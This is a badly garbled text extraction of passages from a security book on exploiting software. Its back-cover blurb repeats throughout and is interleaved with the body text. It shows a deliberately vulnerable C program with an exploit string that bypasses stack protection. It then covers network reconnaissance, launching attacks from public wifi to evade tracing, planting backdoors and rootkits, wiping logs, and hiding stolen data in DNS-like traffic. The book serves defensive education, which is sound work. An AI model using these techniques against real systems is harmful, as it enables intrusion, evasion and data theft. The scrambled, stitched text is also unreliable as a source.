strcpy(temp_request, request_data); p_str = strtok(temp_request, "&"); How while(p_str d oes sof t w are != br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are NULL){ fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can u sed t o b reak soft"id=", war e? Th3) is book p rov ides t he answ er s. ifbe(strncmp(p_str, == 0){ Ex p lo i t in g S o ft w a re is strcpy(user_id, loaded w it h ex amp les of r eal ack s, at t ack pat t er ns, t ools, an d p_str + 3at t); t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear } n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he else if (strncmp(p_str, "pw=", 3) == 0){ scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t strcpy(password, p_str + 3); Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem } When net w or k secur it y m ech anisms do n ot w or k p_str = strtok(NULL, "&"); At t ack pat t er ns } Rev er se engineer in g } Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e /*

Tech niqu es f or cr aft ing m aliciou s inpu t Any combination will fail. The t echn ical det ails of b uf fer ov er f low s

*/

Root k it s

int check_password(char *password){ Ex p lo i t in g S o ft w a re is f illed *id, wit h tchar h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. return -1; } /* We use argv[1] to provide request string.

*/ int main(int argc, char ** argv) { char user_id[32]; • •

Table of Content s

char password[32]; I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

user_id[0] = '\0'; Pub lish er: Addison Wesley

password[0] = '\0'; Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

if ( argc < 2 ) { printf("Usage: victim request.\n"); How d oes return sof t w are0;br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What}t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m uargv[1], st fir st learuser_id, n h ow r ealpassword); at t acks are really carr ied ou t . decode( This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t if ( check_password(user_id, password) > 0 ){ Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem //Dead code. When net w or k secur it y m ech anisms do n ot w or k printf("Welcome!\n"); At t ack pat t er ns } Rev er se engineer in g else{ Classic at t acks ag ainst serv er soft w ar e printf("Invalid password, user:%s password:%s.\n", user_id, password); Sur pr ising at t acks ag ainst clien t soft war e } Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s return Root k it s0; } Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

The f un ct ion decode con t ain s an uncheck ed bu ff er temp_request, an d it s par amet er s user_id and password can be ov er wr it t en by ov erf low in g temp_request. I f t he p rog ram is comp iled w it h t he / GS opt ion, it is not possible t o alt er t he pr ogr am ' s execut ion pat h by over flow ing t he r et ur n add ress of t he f un ct ion decode. How ever , it is

possible t o over flow t h e par am et er user_id of t he f unct ion decode t o m ak e it poin t t o t he afor em en t ioned v ar iable user_handler f ir st ! So, w hen strcpy(user_id, p_str + 3 ); is called, w e can assign a desired v alu e t o user_handler. For ex amp le, w e can m ak e it poin t t o t he mem or y locat ion of printf("Welcome!\n");, so t hat wh en t h e buf fer ov erf low is det ect ed , t her e w ould app ear t o be a user- in st alled secur it y han dler and t he p r ogr am w ill ex ecut e printf("Welcome!\n");. Our exp loit st r in g look s lik e t his: •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

id=[location to jump to]&pw=[any]AAAAAAA...AAA[address of user_handler] I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

Wit h a com piled, " p rot ect ed" binar y, det erm ining t h e m em or y add ress of user_handler is t r ivial given some kn owledg e of rev erse engin eer ing. The up sh ot is t h at a pr ot ect ed pr ogr am is How d oes sof t wable are tbr t acker m ake sof tlyw ar onom p ur act ually v ulner o eak t he?kHow ind ofdoatat t ack it iss sup posed pr eotbr ecteak ed fr . pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s.

Solutions Ex p lo i t in g S o ft w a re is loaded

w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack m eral u st fir n eh ow ealt hat aref ollow reallyedcarr Ther e ,aryeousev altsterlear nat iv p at rhs att acks can be t o ied t h wou artt .t his at t ack pat t er n. Th e best solut ion in volv es hav ing dev eloper s adop t a t y pe- saf e langu age such as Jav a or C# . The n ex t This m ust ion - h ave ay shock y ou—and it will cer t ainly educat Get t ing bey ond best solut is tbook o commpile in dy nam ic checks on st r ing fu nct ions e t hyatou. occur at ru nt im e t he id die en tan f ound any ing book s,) .you w ill solut learnions abou (scr altipt houk gh t het rpeat er fm orm ce h itinmm ust behack account ed for Th ese dot n ot alw ay s m ake sen se given pr oject con st r aint s. arreenex w ill roach con t inue t o be a ser ious oblem Mod if Why y in g tsof het w cur t ploit / GS app is also possible. Thep rm ain goal of each of t he follow ing sugg est ed fix es is t o achieve a hig her lev el of dat a int egr it y on t he st ack . When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns 1 . En su re t he int egr it y of st ack v ariab les b y check ing t he can ary m or e ag gr essively. I f a Rev er se g er a bu ff er on t h e st ack , a sanit y check sh ould be per for m ed b ef or e v ariab le engineer is placed inaft t hat v ariab le is used . The f r eq uency of such check s can b e con t r olled by ap plyin g d at aClassic at t acks ag ainst serv er soft w ar e depend en ce analysis. Sur pr ising at t acks ag ainst clien t soft war e 2 . En su re t he int egr it y of st ack v ariab les b y r ear r angin g t he lay out of t he st ack. Whenever possible, local nonb uff er var iables should be placed befor e b uff er v ariables. Fur t her mor e, Tech niqu es f or cr aft ing m aliciou s inpu t because t he par amet er s of a f unct ion w ill be locat ed af t er local buf fer s ( if t her e ar e any ) , tThe hey t shou t r eat ell.ovOn echn ld icalb edet ailsed of as b ufwfer er ffun lowct s ion ent r y , ext ra st ack sp ace can be r eser v ed befor e local b uff ers so t hat all par am et er s can be copied. Each u se of a par am et er in sid e tRoot he fun k it sct ion b ody is t hen r ep laced w it h it s newly cr eat ed copy . Wor k on t his solut ion has alr ead y been d one by at least one I BM r esearch pr oj ect . [ 11] Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak [ 11] For mor e infor m ation, see GCC Extension For Pr otecting Applications Fr om Stack- Sm ashing soft w ar e. At tacks av ailable at http: / / w w w .tr l.ibm .com / pr oj ects/ security / ssp/ .

3 . En su re t he int egr it y of g lob al v ar iab les b y pr ov iding a m anag ed - w rit ab le m echan ism . Very oft en, cr it ical global var iables become cor r upt ed as a result of pr ogr am err or s and / or int ent ion al abuse. A man aged- w r it able m ech anism can p lace a gr oup of such v ariab les in a r ead- on ly region . When m odify ing a v ar iable in t he r egion is necessar y , t h e m em or y access p er m ission of t he r egion can b e ch anged t o " wr it able. " Af t er t he m odificat ion is m ade, it s per m ission is ch anged back t o " read- on ly. " Wit h su ch a m ech anism , an u nexp ect ed " w rit e" t o a pr ot ect ed var iable r esult s in mem or y access

v iolat ion . For t he k ind of v ariab le t hat only get s assigned once or t w ice in t he life of a pr ocess, t h e over head of apply ing a m anag ed - w rit ab le m echan ism is n eg lig ible. Sub sequ en t r eleases of t he Micr osoft com p iler hav e ad opt ed pieces of t hese ideas.

An Exploit in Retrospect •

Table of Content s

•By now , t he Iirndex ony of t h is at t ack should be ap par en t : Micr osoft en ded up building a secur it y Expl oit ing Softw a re Howint tooBrt eheir ak Code v ulner abilit y seeder com piler b y creat ing a feat ur e int end ed t o t hw ar t a st andar d at Gr t ack Th e gr, Gar eaty tMcGr h in gaw is t hat t he at t ack p at t ern of t he ex ploit against t he br ok en f eat ur e is By eg !Hoglund t he ver y same at t ack pat t er n t hat t he f eat u re w as su pposed t o p rot ect ag ainst . The p r oblem is t hat non vu lnerab le uses of som e st r ing fu nct ions becom e vu lnerab le w hen t h e feat u re is Pub lish er: Addison Wesley inv ok ed . This is b ad f or soft w ar e secu rit y , b ut it ' s g ood f or exp loit in g sof t w are. [ 12] Pub Dat e: February 17, 200 4 [ 12] I SBN: 20 1- 786 95 -8 The0-announcem ent

of this flaw caused a consider able flu rr y in the pr ess. See http: / / w51 w 2w .cigit al.com / pr ess for point er s t o the resu lt ing ar ticles. Pages:

Tw o y ears aft er t h is flaw w as p ublicly discu ssed, at least t w o 0 day ex ploit s w er e d iscov er ed t hat w ere built ar ou nd lev erag in g t he / GS flag t o car r y out t w o- st age t r am poline- based at t ack s. As pr edict ed , t he secur it y m echan ism w as used as a foot h old in t hese exp loit s. How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Applying Attack Patterns At t ack in g a syst em is a pr ocess of discover y and exp loit at ion. At t ack er s p rog r ess t h rou gh a ser ies of discov er y phases befor e act u ally f inding an d ex ploit ing a sof t w are v uln er abilit y . What f ollow s is a ver y hig h- lev el ov erv iew of t he st eps com m only used. Lat er in t he book we, •by an d lar g e, Table of over Content s p ass r epeat ing t hese ideas in fav or of focusing m or e at t ent ion on t echn ical •discussion ofI ndex exp loit s. Expl oit ing Softw a re How to Br e ak Code

A Gr successf ul at t ack t ak aw es sev eral logical st ep s. Fir st , qu alif y t he t ar get , m ainly t o lear n wh at By eg Hoglund , Gar y McGr inpu t p oint s ex ist . Nex t , f igur e out t he kind s of t r ansact ions t hat ar e accept ed at t he inp ut point s. Each k ind of t r ansact ion m u st be ex plor ed t o det erm ine w h at k inds of at t ack s w ill Pub lish er: Addison Wesley w or k. You can t hen use at t ack pat t er ns t o const r uct m alfor m ed but " leg al" t r ansact ions t h at Pub Dat e: February 17, 200 4 m anipu lat e t he sof t w are in int er est ing w ay s. This r equir es close ob ser vat ion of t h e result s of SBN: 0- 20 1- 786 -8 d t o d et er m in e w het her y ou mig ht h ave discov ered a p ossible each t rIansact ion you95 sen 51 2Once a v uln er abilit y is d iscover ed, y ou can t r y t o exp loit it an d t h er eby g ain v ulnerPages: abilit y. access t o t he sy st em . I n t his sect ion, w e cov er sev er al br oad cat eg ories of at t ack p at t er n s. Part icular at t ack pat t er ns can be foun d in each of t h ese cat egor ies. A seasoned at t acker w ill hav e w or k in g at t ackd oes pat tsof er ns for all t he?cat egor n comb at ion, t ack ns b ecom es t he How t w are br eak How doies. at t Iacker s minake sof tawset ar e of br at eak on pat p urt er pose? Why are tfir ool k it of t he successfu l at t acker . ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g SScanning o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Network t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Ther e ar e m any special- p ur pose t ools f or net w or k scann ing. Rat her t h an d iscuss a par t icular set of t ools or h ack er scr ipt s, w e en cou rag e you t o exp lor e t h e net w or k pr ot ocols t hem selv es, This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he considerin g h ow t hey can be lever aged t o acqu ire t arg et s and t o d et er m ine t he st r u ct u re of a scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t net w or k. St ar t w it h a b ook lik e Fir ew alls and I n t er n et Secur it y [ Ch esw ick et al. , 200 3] . New at t ack pat t er ns are st ill b ein g d iscov er ed in p rot ocols t h at ar e m or e t han 20 y ears old ( consider, for t ex am I CMP ing,t inue SYN tping in g,pan d f ir ew alk in g) . New er pr ot ocols Why sof w ar e ple, ex ploit w illp con o be, aUDP ser p ious r oblem pr ov ide even easier t ar get s. We sug gest t hat y ou ex am ine Of ir Ar kin' s w or k on I CMP scan ning . [ 13] When net w or k secur it y m ech anisms do n ot w or k [ 13]

Sear pat ch for At t ack t erICMP ns on Ofir Ar kin's Web page at http: / / w w w .sys- secur ity.com .

Net w ork in g can be Rev scann er se engineer in g t houg ht of as som et hin g q uit e simp le ( and best left t o t ools) or it can be t r eat ed as a science in and of it self. Net w or k scans can almost alw ay s b e det ect ed by r em otClassic e sit es at m tann edag byainst p ar anoid acks serv eradm softin w ist ar reat or s w h o w ill call upst r eam on t he r ed phon e if t heir n et w or k sees a sin gle r login por t r equest , so w at ch out for t hat . On t he ot her h and, a Sur ising at ainst t y pical mpr achine ont acks t he I ag n t er n et clien t odayt soft g et swar 10et o 2 0 por t scans a day w it hou t n ot icing a t hing . Tools t hat per for m b asic p or t scans ar e classic scr ipt k iddie t ools. Ev en pr ofessional ( and f orions cr aftlik ing m aliciou s inpu t exp enTech siv e)niqu appes licat e Foun dst one's Foun dScan and NAI ' s Cy ber Cop ar e ver y close in spir it t o collect ion s of fr eely available t echnolog ies. The t echn ical det ails of b uf fer ov er f low s Som et im es por t scan s can b e ver y sophist icat ed an d sneak y, sp readin g ov er t hou sands of Root k itas har d- t o- d et ect dr ip - scan conf ig ur at ion. A t ar get sit e m ay only g et one or t w o net w or ks in st r ange p ack et s an hou r, but at t he end of t he w eek t heir syst em s w ill hav e been ent ir ely Ex p lo i t in Fir g Sew o ftalls w acause re is f illed t h e inconv t ools, enience con cept s, ow ledgbu e necessar y tso m b reak scan ned! som ewit mhinor in and t his kn pr ocess, t p ort scan ay be soft w ar e. clev er, using br oadcast or m ult icast sour ce add resses an d clever p ort and f lag com binat ion s t o defeat t y pical ( lam e) f irew all f ilt er s.

OS Stack Identification On ce a t ar get m achine is discov ered, addit ional t r ick s can be app lied using st andar d pr ot ocols t o discer n t he OS ver sion on t he t arg et dev ice. Th is in clu des t ech niques t o t w eak

TCP opt ions, p er f orm I P fr agm ent at ion and r eassem bly, set TCP f lags, and m anip ulat e I CMP behav ior . Ther e ar e an in cr edible n um ber of qu er ies t hat can b e used t o det erm ine t he t ar get OS. Most pr ov ide only a piece of t he answ er , but t oget h er t hey can b e analy zed t o com e t o a r easonab le t heor y r eg ard ing t he t ar get OS. I t 's nearly im possible t o hide t h e ident it y of a sy st em w hen t here are so man y possible pr obes an d r esponses. Any at t em pt t o m ask nor m al r esp onses by sen ding out false inf orm at ion w ould, in eff ect , cr eat e a st r an ge v ariat ion , but w it h en ough det er m in ed pr ob in g, • Table of Content s t he sy st em is almost alw ays id en t ifiable. Fur t her mor e, cert ain set t ings ap plied t o a n et w or k • I ndex int er face or st ack ar e oft en r em ot ely det ect able. One ex am ple is t h e use of net w or k sn iff er s. Expl oit ing Softw a re How to Br e ak Code I n man y cases, t he behav ior of a m achine t h at is r un ning a sn if fer is u nique and can b e By Gr eg Hoglund , Gar r em ot ely det ect edy McGr ( f or aw m or e infor m at ion go t o ht t p: / / pack et st or m secur it y . nl/ sniff er s/ ant isnif f) . Mach ines r unnin g in pr om iscu ous m ode ar e m orPub e open o net wWesley or k - lev el at t acks becau se t he sy st em end s up pr ocessing all p acket s on t he lish er: tAddison net w or k, ev en ones dest Pub Dat e: February 17, 200in 4 ed f or ot her h ost s. I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

Port Scans Pr imar ily a n et wor k - lay er f un ct ion , por t scans can be r u n ag ainst t h e t ar get t o det erm ine w hich ser vices ar e r unnin g. Th is in clu des bot h TCP and UDP p ort s. I f a list ening por t is discover edsof , t rtansact ions be do r unatagainst p ortsof t ot wdet m eak ine ton h e pser v ice ruWhy nningare on t he How d oes w are br eakcan ? How t acker st he m ake ar eerbr ur pose? por t and he ru p rot ocols it appear t o s, und er stant and cutk eep t heir ogr am h fir ew alls, tint sion det ect ion sy sts em and iv.irMany us softhacker war e ns ot in gprout t hemin badg gt eet uy s? by w r it ing por t scann er s. Th us, t her e ar e t hou san ds of por t scan ners available, bu t m ost of What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. t hem ar e r eally bad desig ns. The m ost com m on por t scanner is so well- k now n it doesn' t rEx eqpuir mg uch h er e. I tw is nm ort ack e infs,orm ionpat got er t ons, t ools, an d lo iet in S odftiscussion w a re is loaded it hcalled ex amp lesapof( for r ealmat at tat ack ht t p: / / w w . in secur nms ap/ ) . eak I f y ou p lay ed arou nd ect w it h p or sof t scanning t hen t echniqu eswused by e.or bad g/ guy t o br sofhav t w are e.never I f y ou w ant t o p rot y our t w ar e fr,om nm ap ,isy aoug ood t o st t w it h sin it supp s so carr m any ar tiat at t ack m u stchfiroice st lear n ar h ow r eal atce t acks are ort really ied vou . ion s of scan ning. Go a st ep f ur t her t h an n or mal by using a net w ork sn if fer t o analy ze t he scans pr oduced b y nm ap. This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Traceroute and Zone Transfers Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Tr acer out e packet s ar e a clev er w ay t o det er min e t he ph ysical lay out of net w or k devices. DNS When net waorgr k eat secur it y of m ech anisms n ot wI or k r esses and t he p ur pose of m ach in es ser v ers p r ovide d eal infor m at iondoabout P add t hat ar e connect ed t o t hem . OS ident ificat ion dat a and por t scans can be ov er laid t o pr ovid e t ack pat er ns of det ail f or an at t acker . When used t oget her, a v ery accur at e m ap of a a su rpAtrising am tount t ar get n et wor k can be b uilt . I n ef fect , t h is act iv it y r esu lt s in a det ailed m ap of t he n et w or k Rev er engineer input g point s w here at t ack dat a will b e accept ed int o applicat ion- lay er and clear ly se illust r at es in soft w ar e. At t his st age, t h e applicat ion sof t w are can be pr obed d irect ly. Be aw are t hat zone Classic at t acks ag ainst serv er soft w ar e files can be v er y lar ge. Sev er al y ears ago, on e of t he au t hor s ( Hoglun d) receiv ed a zone f ile for t he ent e coun ry of ag Fr ainst ance. clien ( I t wt as big. Sur prirising at ttacks soft war) e Tech niqu es f or cr aft ing m aliciou s inpu t

Target Components

The t echn ical det ails of b uf fer ov er f low s

I f t heRoot t ar gketit ssyst em includes p ublic f ile or Web serv ices, t h ese shou ld b e ex am ined for possible low - hang ing fr uit . Tar g et comp onent s such as cgi p rog r ams, scr ip t s, ser v let s, an d EJBs t o kn ock . Eachcon comp ran sact ion t hu s Ex p loare i t inngotSor o iously ft w a reeasy is f illed wit h t over h e t ools, ceptonent s, andmay kn owaccept ledg e tnecessar y tso and b reak pr esent s an in t erest ing inpu t p oin t t o inv est igat e fur t h er . You can quer y t he t arg et t o lear n soft w ar e. abou t an d ev en cr aft w ork ing t r ansact ions, or y ou can laun ch n et w or k sniff ers t hat recor d r eal- w or ld t r ansact ion s ex ecut ed ag ainst t h e t ar get . These can b e used as baseline t r ansact ions t h at can lat er be t w eaked accor din g t o m or e sp ecific at t ack pat t er ns described in t his b ook.

Choosing Attack Patterns

On ce a v alid t r ansact ion p at t ern is d iscov er ed, it can b e m ut at ed usin g a v ar iet y of at t ack pat t er ns. You m ight t r y com man d in ject ion , f ile sy st em API inject ion, d at abase St r uct ur ed Qu er y Languag e ( SQL) insert ion , app licat ion- lay er denial of serv ice, or net w or k- b ased denial of ser v ice. You m ight also exp lore t he inp ut sp ace look ing for buf fer ov er f lows. I f a v ulner abilit y is discov ered, t hen it can be lever aged t o gain access t o t he sy st em .

• TableFaults of Contentin s the Environment Leveraging •

I ndex

Expl oita ing Softw abilit a re How Br e ak er Code On ce v ulner y istouncov ed, a v ariet y of at t ack p ayloads can be applied t o gain r em ot e access t o t he ,sy styem . Comm on at t ack pay loads ar e cov er ed t hr ough out t his b ook. Th e By Gr eg Hoglund Gar McGr aw adv ant ag e t o our syst em at ic syst em s- lev el appr oach is t hat t he v isib ilit y of p ar t icu lar pr oblem b e det erm ined. A cert ain pr oblem m ay on ly be exp loit able fr om in side t he Pub lishser:can Addison Wesley fir ew all. Because w e h ave a larg e net w or k v iew of t h e t ar get , w e m ay b e able t o find ot h er Pub Dat e: February 17, 200 4 neighb or in g ser ver s t hat can be exp loit ed , and t hu s t ak e adv ant ag e of our k now ledge of t he I SBN: 0- 20 1- 786 95 -8 syst em t o cir cle back lat er. This allow s us t o t ak e a n um ber of subt le st eps t o inf ilt rat e a Pages: 51 2. Consider, for ex am ple, a t ar get on a DSL line. The D SL p r ovider m ay h ave a t ar get sy st em DSLAM t h at serv es m any clien t s. The DSLAM m ay f or w ard all b road cast t r aff ic t o all dow n st r eam subscr ib er s. I f t he t arg et is w ell pr ot ect ed or h as few inp ut point s, it m ig ht mak e m or e sense t o at t ack anot h er nearb y syst em . On ce t hat is com pr om ised, t he n ear by sy st em can be used t o ARP hijack t h e har d t ar get . How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Using Indirection

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d A clear goal wh enbyp en et rguy at ing syeak st emsof ist w t oarhide e atwt ant acker t it y. This t echniqu es used bad s t oa br e. I f t yhou t o'sp id roten ect y our sofist wv ery ar e easy fr om t o [ 14] A St ar buck s accom p lish t oday u sin g u plink s t o u npr ot ect ed 8 02. 11 w ir eless net w or ks. at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . coff ee sh op w it h a w ir eless link m ay p resen t an incr ed ibly comf or t able place f rom w hich t o launch at t-ack s. The t h ing youy ou—and need t o ditowill is t ocer pick up educat y our " dou ble-Get sh tor t drbey y cap" This m ust h ave booklast m ay shock t ainly e y ou. ing ond tinhea dr e- tkhidr udie ont ryeat ourmwen ayt ftound o somine m cold wing ay ! book I nd irect ion w t echn iq ues let ty ou keep y our saf e scrivipt anyalley hack s, you ill learn abou zone war m an d dr y, cor por at e ev en . Geopolit ics also help wit h ind irect ion. You 'r e fair ly safe if y ou' re d r in kin g cof fee in a Houst on St ar buck s w hile launchin g an at t ack f r om New Dehli ov er Why ar e ex ploit w ill con o ern be et a ser ious r oblem t he bor der sof inttow China. There w ill bet inue no I tnt Serv ice pPr ovider s ( I SPs) shar ing log files across t hose bor der s. And ex t r adit ion is out of t he q uest ion . When net w or k secur it y m ech anisms do n ot w or k [ 14]

See 802.11 Secur it y [ Pot ter and Fleck , 2003] .

At t ack pat t er ns Rev er se engineer in g

Planting Backdoors Classic at t acks ag ainst serv er soft w ar e On ce an ex ploit h as been successfu l, ch ances are t hat you w ill at t ain comp let e access t o a Sur at t acks ag clien t soft wara esecu re t unn el over t h e fir ew all and cleanin g u p host in sidpre ising t he t arg et net wainst or k. Est ablishing any p ossible log f iles is t h e next st ep. I f y ou cause a not iceab le fau lt in t he t ar get sy st em, t he Tech niqu esinit f orion, cr aft ing m aliciou s inpu t s. You r goal is t o r emov e any t r ace of t h ese fau lt w ill, by d ef h ave obser v able eff ect observ able ef fect s. Reboot any t hing t hat m ay hav e cr ash ed . Clear all logs t hat sh ow pr ogr am echn icaletdet ails ofYou b ufw ferill ov f low s wan t t o leav e a r oot kit pr ogr am or b ackd oor v iolat The ion st or pack t r aces. t y er pically shell t hat w ill en able access at any t im e. Ch apt er 8 is all about such t rick s. A r oot k it pr ogr am Root k it s can be hidd en on t h e host . Ker nel m odificat ions m ak e it p ossible t o hide a r oot k it com plet ely fr s adm inist r at or it ing con sof tcept w ar e. back doorecode can even Exom p lotihe t insy g st S em o ft w a re is f illed wits hort haud e t ools, s, Your and kn ow ledg necessar y t o bbe reak hidd en w it hin t h e BI OS or w it hin t h e EEPROM mem or y of perip heral car d s and equipm ent . soft w ar e. A g ood backd oor m ay be t r igg er ed by a sp ecial pack et or it m ay be act iv e only at cer t ain t im es. I t m ay per for m du t ies wh ile you ar e aw ay , such as key st r ok e logg in g or packet sniff ing. A f avor it e of t he milit ar y seem s t o be r eading e- mail. Th e FBI appear s t o lik e k ey st r oke m on it ors. Wh at y our rem ot e m onit or d oes depends on y our goals. Dat a can be fed out of t he n et wor k in r eal t im e or st or ed in a safe place for lat er r et riev al. Dat a can be encry pt ed f or pr ot ect ion in case of d iscov er y . St or age f iles can be h idden using sp ecial k ern el m odificat ions. D at a can be f ed out of t he net w ork u sin g p acket s t h at ap pear t o b e st andar d pr ot ocols ( using st eganog rap hic t r ick s) . I f a n et w or k h as a g reat deal of DNS act iv it y , t hen

hidin g ou t going dat a in DNS look - alike p ack et s is a good idea. Sending bu r st s of com plet ely nor m al t r af fic along w it h you r disguised p acket s can also m ake t he special packet s h ard er t o locat e. I f y ou r eally w ant t o get f ancy, you can use classic st eg anogr aph y t r ick s, even at t he pack et level.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Attack Pattern Boxes Man y of t he chap t er s in t he rem ainder of t h e book includ e box es br ief ly descr ibing par t icular at t ack pat t er ns. Th ese b oxes serv e t o gener alize an d en cap su lat e an im p ort an t at t ack p at t ern fr om t he t ex t t h at sur r ound s it . Such box es look like t his ( t he ex am ple display ed h er e •app ear s in Ch Table of Content s apt er 4) : •

I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw Pub lish er:Programs Addison Wesley That Write to Privileged OS Resources Target Pub Dat e: February 17, 200 4 I SBN: 0- 20ram 1- 786 -8 w r it e t o t he sy st em dir ect or ies or r eg ist r y k ey s ( such as Look for p rog s 95 t hat Pages: 51 2 are t yp ically r un w it h elev at ed pr iv ileges an d u su ally hav e not been HKLM) . These designed w it h secu r it y in m ind . Such pr ogr am s ar e ex cellent ex ploit t ar get s because t hey y ield lot s of pow er w hen t hey b reak .

